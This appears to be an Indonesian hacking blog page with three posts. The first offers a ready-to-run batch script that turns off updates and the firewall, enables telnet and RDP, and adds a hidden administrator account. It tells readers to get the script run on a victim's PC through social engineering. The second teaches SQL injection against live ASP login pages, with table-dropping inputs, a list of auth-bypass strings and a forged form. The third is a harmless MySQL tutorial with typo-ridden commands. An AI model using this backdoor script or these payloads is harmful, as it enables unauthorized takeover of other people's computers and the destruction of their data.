Showing posts with label Server. Show all posts
Showing posts with label Server. Show all posts

Wednesday, March 9, 2016

// // Leave a Comment

Script Instan Remote Dekstop Protokol

Cara remote komputer orang lain dengan cmd mungkin membutuhkan beberapa kode cmd dengan cara step by step,tapi kali ini saya akan share script instan rdp tinggal run saja tanpa repot setting ganti admin user dan lain-lain.Script ini memang agak berbahaya karena bisa mematikan firewall dan add administrator baru di komputer lain.memang tujuan dari script ini untuk kegiatan hacking komputer atau laptop orang lain.Jika beda atau tidak dalam satu jaringan seperti jaringan LAN atau Wifi harus mempunyai server sendiri untuk remote dan sebagai host server.Gunakanlah layanan hosting server atau vps gratis bisa dicari di google search.

Langsung saja tulis scriptnya atau bisa copy paste di notepad
1.pertama buka dulu notepad dengan cara Run>notepad>enter atau tekan tombol windows +R>Notepad>enter.
2.
@echo off

REM ****************
REM Disable off "AUTO UPDATE"
REM ****************
sc config wuauserv start= disabled
net stop wuauserv

REM ****************
REM Disable windows xp Firewall
REM ****************
netsh firewall set opmode disable

REM ****************
REM Enable TELNET
REM ****************
sc config tlntsvr start= auto
net start telnet

REM ****************
REM Enable Remote Desktop
REM ****************
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

REM ***************
REM Create a HIDDEN USER usr= hack007, pass= dani
REM ***************
net user hacker007 dani /add
net localgroup "Administrators" /add hacker007
net localgroup "Users" /del hacker007
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hacker007 /t REG_DWORD /d 0 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f

3.Simpan dengan extensi .Bat contoh RDP.BAT    >(gunakan teknik sosial engginering)
hack pc

4.file harus dijalankan atau Run di komputer orang lain(target)

5.id password bisa diganti dengan versi kamu sendiri...digunakan untuk login di windows

6.ingat scrip diatas hanya untuk dalam satu jaringan saja misalnya LAN/hotspot WIFI

Tolong gunakanlah dengan bijak,dan baca artikel lainnya di blog ini.jika berhasil anda mempunyai hak full akses di komputer target.anda bisa lihat apa yang ada di folder/menghapus foldel dll.Seperti anda yang mempunyai pc/laptop tersebut.
terima kasih sudah berkunjung

Read More

Thursday, January 14, 2016

// // Leave a Comment

Pemahaman Dasar Apa Itu Sql Injection Dan Fungsinya

Sebelum membahas tentang Bagaimana sql injection itu pertama-tama saya akan menerangkan apa itu sql injection dan kenapa hal itu bisa terjadi.
Sebenernya SQL injection terjadi ketika attacker bisa meng insertkan beberapa SQL statement ke 'query' dengan cara manipulasi data input ke applikasi tersebut.
Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql ,
disini saya cuma akan membahas tentang ASP+MsSql yang sudah dicoba pada IIS 5 dan beberapa sql injection pada url.
Biasanya Sql Injection dilakukan pada login page pada asp seperti di :
               admin\login.asp
               login.asp
Jadi yang akan menjadi target adalah page tersebut ,
sekarang kita mulai saja dengan dasar-dasar sql injection.
Biasanya di sql statment:
               select id, user_name, password from user
maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.
Biasanya pada login page dengan mengunakan statment result setnya sebagai berikut :

select id, user_name,password from user where name = 'echo' and password='password'

Pada IIS dan ASP apabila terdapat kesalahan syntax script akan diberi tau dan ditampilkan di browser
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language" 
seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah,Tidak tahu kenapa karakter single quote 'breaks out' dari delimiter nya SQL  Jadi kalau misal ada inputan 
User: echo';drop table user--
dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginnya.
oh iya ini merukapan mark nya MSSQL, jadi perintah selanjutnya tidak di execute.
Sekarang untuk lebih jelasnya kita secara langsung pada login script seperti
input login + password. Nama field nya 'login' dan 'pass'. dan 
SQL nya di asp: var sql = select * from users where username='"+login+"' and password='"+pass"'";
coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative)
pasti ke droplah tuh table usersnya.
Aduh dari pada pusing ya , gini deh cara gampangnya adalah kita lupakan saja yang diatas.kita langsung praktek saja:
Coba carilah disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau
admin\login.asp.
Kalau sudah dapat masukkan nih variable sql nya
user:admin 
pass:' or 1=1--
Raw end Task echo left 1

Ingat kita disini hanya coba-coba kali aja dba nya tidak terlalu pinter.
atau :
user:' or 1=1--
admin:' or 1=1--
Mas , tidak bisa nih gimana ya ?
Inget sekarang rata-rata para admin pada pinter semua , kita cari yang gampang saja deh untuk tes kalau ga, kamu bisa buat sendiri script dan tes karena gw sudah coba buat sendiri dan berhasil tanpa melakukan paket filter pada db nya .Untuk test apakah suatu page mempunyai vulnerable,begini caranya :
Kalian pernah melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :
http://vivtim/index.asp?id=10
Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahan
pada addressnya seperti memasukan : test'1=1-- 
menjadi http://victim/index.asp?id=test'1=1--
Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target
lalu kita tamhankan hidden field pada source tersebut sebagai contoh :
               <FORM action=http://victim/admin/login.asp method=post>
               <input type=hidden name=A value="test' or 1=1--">
               </FORM>
Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username.
ingat script ini ditambahkan pada script yang sudah kalian download dari target .
                                                             
                                                             Variable ' or 1=1--
Mungkin ada yang bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat penting.Lihat contoh pada sebuah web tertulis http://victim/index.asp?category=laptop
Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tersebut.
Kalau ditulis dalam script ASP maka akan menjadi :
               v_cat = request("category")
               sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
               set rs=conn.execute(sqlstr)
Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pada sql statment menjadi
               SELECT * FROM product WHERE PCategory='laptop'
lalu apa hub dengan 'or 1=1---
coba kalau kita ganti http://victim/index.asp?category=laptop menjadi
               http://victim/index.asp?category=laptop'or 1=1--
Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya menjadi
               SELECT * FROM product WHERE PCategory='laptop' or 1=1--'
artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkan
Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tersebut yang mengakibatkan
kita bisa masuk kedalam db teserbut dan db tersebut tidak berfungsi. Lalu tanda -- merupakan 
mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page
Kita bisa masuk kedalam login page tanpa password dan user name.
Kemungkinan-kemungkinan variable lainya :
               or 1=1--
               " or 1=1--
               or 1=1--
               ' or 'a'='a
               " or "a"="a
               ') or ('a'='a
               ' or 0=0 --
               " or 0=0 --
               or 0=0 --
               ' or 0=0 #
               " or 0=0 #
               or 0=0 #
               ' or 'x'='x
               " or "x"="x
               ') or ('x'='x
               ' or 1=1--
               " or 1=1--
               or 1=1--
               ' or a=a--
               " or "a"="a
               ') or ('a'='a
               ") or ("a"="a
               hi" or "a"="a
               hi" or 1=1 --
               hi' or 1=1 --
               hi' or 'a'='a
               hi') or ('a'='a
               hi") or ("a"="a
               
Selain masuk kedalam page tersebut kita juga bisa memanfaatkannya untuk remote execution dengan sql Injection
dan untuk artikel akan dimasukan dalam ezine 3 echo.or.id .Semoga artikel ini bermanfaat.
Pengunjung yang baik meninggalkan komentar dan share article ini.

Read More

Friday, December 4, 2015

// // Leave a Comment

Tutorial Membuat Database MySql dan Xampp di CMD

 



      Membuat Database untuk keperluan tugas atau mendata suatu barang jika dilakukan secara manual mungkin terlalu sulit dan memakan banyak watu,kali ini akan membahas Cara membuat database server MySql dan Xampp dengan cmd.

   
Silahkan ikuti Tutorial step By step :

1. Buka Control Panel Xampp (Start - All Program- Xampp)
2. Pastikan Apache dan MySQL Running (Cek di task manager)
3. Masuk ke CMD dan Tuliskan Script berikut : (agar terlihat keren sedikit ganti warna tulisan dengan warna biru,hijau,atau merah.Caranya ketik Color a tekan enter untuk warna hijau,biru color b,dan warna merah color 4)
-----------------------
cd ..
cd ..   
cd xampp
cd mysql
cd bin
mysql -u root
-----------------------

4. Bila berhasil ada bacaan 'Welcome to MySQL monitor'. Okeh Kita Lanjutkan dengan databasenya
5. Create database penjualan;
6. Use penjualan;
7. Lalu kita membuat Tabel dari database tersebut :
8.  -------------------------------------------------------------
        Create table barang (
        Kode Varchar (5) Not Null,
        Nama Varchar (20) Not Null,
        Harga Integer Not Null,
        Primary key (Kode)
         );
------------------------------------------------------------------

9. Kita akan membuat isi dari Tabelnya :
-------------------------------------------------------------------------------------------------------------------
Insert into barang (Kode, Nama, Harga) Values ("001","Indomie Goreng","2000");
-------------------------------------------------------------------------------------------------------------------
10. Bila ingin melihat Hasilnya : Select*From barang;

11. Bila ingin membuat isinya banyak, Ulangi langkan No.10 tetapi 001 diganti menjadi 002 karna tadi kita mengkasi Primary Key di Kode.

TAMBAHAN

*Disini saya sudah membuat 3 isi dari tabel tersebut*

1. Melihat Hasil : Select*From barang; 
2. Melihat Tabel : Show Tables;
3. Melihat Struktur Pembuatan : Desc barang;
4. Menambah Field : Alter table barang add Jumlah Integer Not Null; 
*Bila ingin mengisi datanya gunakan sama sepertinya No.8*

5. Merubah Nama Field : Alter table barang change Nama Nama_Barang varchar(20) not null;

6. Merubah Isi Field : Update barang set Nama_Barang="Shampo" where kode="001";

7. Menghapus Satu Barisan : Delete from barang where kode="001";

8. Menghapus Table : Drop barang;
9. Menghapus Database : Drop enjualan;

(sumber:Tribaguskartiko)

Tutorial Membuat database mysql dan xampp di cmd versi 2

Membuat database mahasiswa memang jarang yang membuatnya,tapi ada juga yang tidak mau repot nulis sana sini.Tutorial kali ini cara untuk membuat database mahasiswa.

Kenali dulu apa itu Xampp dan Mysql?
XAMPP merupakan salah satu aplikasi Server yang  beberapa aplikasi server  yaitu Apache (web server), MySQL (database server/Sistem Manajemen Database/ Salah Satu Jenis Database), PHPMyAdmin (Aplikasi yang digunakan untuk perancangan database).

sekarang kita lanjut cara perancangan database melalui CMD (Command Prompt), yang mana perancangan database melalui CMD kita harus paham tentang struktur SQL (Stucture Query Language) yaitu struktur untuk mebuat database beserta atribut-atributnya.

1. Jalankan aplikasi Control Panel dari XAMPP yang sudah diinstall di computer

2. aktifkan database server dengan cara pilih tombol "START" pada modul MySQL, seperti dibawah ini:
3. akses CMD.exe dengan Cara  "Windows+R", Start>>run>>, defaultnya akan menuju folder user, kemudian masuk kepada folder mysql.exe yang ada pada folder xampp, lakukan langkah2 dibawah ini sampai mysql terkoneksi:

 4.selanjutnya buat database dengan nama "mahasiswa"
                      mysq> create database mahasiswa

5. kemudian buat table beserta field pada database di cmd
                       mysql>use mahasiswa //(menggunakan database mahasiswa)
                     mysql>use create table identitas(
             ->nobp varchar (15) not null,
             ->nama_mhs varchar (50) not null,
             ->jurusan varchar (30) not null,
             ->primary key(nobp)
             ->);
ctt :"identitas" adalah nama table, "nobp,nama_mhs, jurusan", adalah nama field dalam table "identitas"

6.lihat table dalam database
                mysql>show tables from mahasiswa;
7. lihat field table pada database di cmd
                mysql>describe identitas;
8. isi record/data  field table identitas
 mysql>insert into identitas values('140001','ondra eka putra','Sistem Komputer');


9. melihat data/ record

10. menambahkan field dalam table identitas jika field yang digunakan kurang dari yang dibutuhkan yaitu    nohp

 
 mysql>alter identitas add nohp varchar (15) not null;


11. mengubah nama field jika ingin dilakukan, disini saya ganti nama filed 'nama_mhs' dengan 'Nama_Mahasiswa'
// ganti nama field
mysql>alter table identitas change nama_mhs Nama_Mahasiswa varchar (50) not null;
// menampilkan field dalam table
mysql>describe identitas;
// menampilkan record data pada table identitas
mysql>select*from identitas;
12. melakukan update data
 
mysql>update identitas set nohp"085274xxxxx" where nobp="140001";
// update data nohp pada nobp="140001" sebagai nilai data syarat.
 
13. keluar dari mysql.exe
 Sekian dan terima kasih,semoga berhasil
Read More